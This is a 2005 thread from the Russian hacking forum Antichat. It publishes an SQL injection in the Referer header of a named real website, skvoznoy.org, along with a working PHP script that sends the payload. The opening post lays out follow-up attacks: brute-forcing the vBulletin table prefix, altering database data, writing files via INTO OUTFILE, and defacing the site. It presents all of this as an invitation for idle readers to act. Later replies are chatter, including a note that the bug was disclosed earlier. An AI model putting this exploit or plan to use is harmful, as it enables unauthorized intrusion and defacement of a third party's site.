Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   =d (https://forum.antichat.xyz/showthread.php?t=11358)

Zadoxlik 05.12.2005 16:07

skvoznoy.org
 
Мимо проходил. Сайт из серии крутых хакеров:

skvoznoy.org

____________________________________
$fp=fsockopen("skvoznoy.org",80);

fputs($fp,"GET http://skvoznoy.org/news/332/ HTTP/1.0
Referer: http://skvoznoy.org/news/332/' union select 0,0/*

");
$get= fgets($fp).fgets($fp).fgets($fp).fgets($fp)
.fgets($fp).fgets($fp).fgets($fp).fgets($fp)
.fgets($fp).fgets($fp)
.fgets($fp).fgets($fp);
fclose($fp);
echo $get;
____________________________________

SQL-инъекция классическая в реферере. Цветом выделено 0,0 - неверное количество колонок, чтобы показать ошибку при выводе $get. На самом деле колонка одна. Вот, на сайте стоит вБуллетин. Надо сбрутить только преффикс и возможно БД для форума и можно будет удалять/добавлять данные. А можно похимичить и с ИНТО ОУТФАЙЛ.
Еще можно сбрутить имя таблицы новостей и задефейсить сайт

bul666 05.12.2005 16:30

Ты это к чему? Ты вопрос какойто задал?

Zadoxlik 05.12.2005 16:31

Цитата:

Сообщение от bul666
Ты это к чему? Ты вопрос какойто задал?

нет, дал пищу для размышлений и, возможно, каких-либо действий для тех кому заняться нечем

PSalm69 05.12.2005 16:44

Цитата:

Сообщение от Zadoxlik
нет, дал пищу для размышлений и, возможно, каких-либо действий для тех кому заняться нечем

fsockopen очень уж часто я с ним сталкиваюсь. И понятно почему =)
Надо же.... Zadoxlik рано в паблик скинул ИМХО =)

SanyaX 05.12.2005 17:06

Это ты в исходниках посмсотрел?

SanyaX 05.12.2005 17:08

Блин жалко у меня ума не хватит что как делать а инькция у меня не вылазиет почему то.

Zadoxlik 05.12.2005 17:17

Цитата:

Сообщение от SanyaX
Это ты в исходниках посмсотрел?

Не, это просто пример эксплуатации с помощью PHP скрипта, ибо браузером ты такое не сделаешь.
На сколько мне известно, все нормальные люди пользуют в таких случаях InetCrack (или как-то так), но у меня его нет.

qBiN 05.12.2005 17:30

Цитата:

InetCrack
Телнет =)

m0nzt3r 05.12.2005 17:50

интересно а зачем на паблик кинул=) я в скуле несилен к сожалению(

k1b0rg 05.12.2005 20:26

Цитата:

интересно а зачем на паблик кинул=) я в скуле несилен к сожалению(
хех, эту уявзимость уже я наверное месяц назад на паблик выложил (смотри в теме "бажные сайты от киборга").
и никто даже не пытался прикрыть


Время: 17:30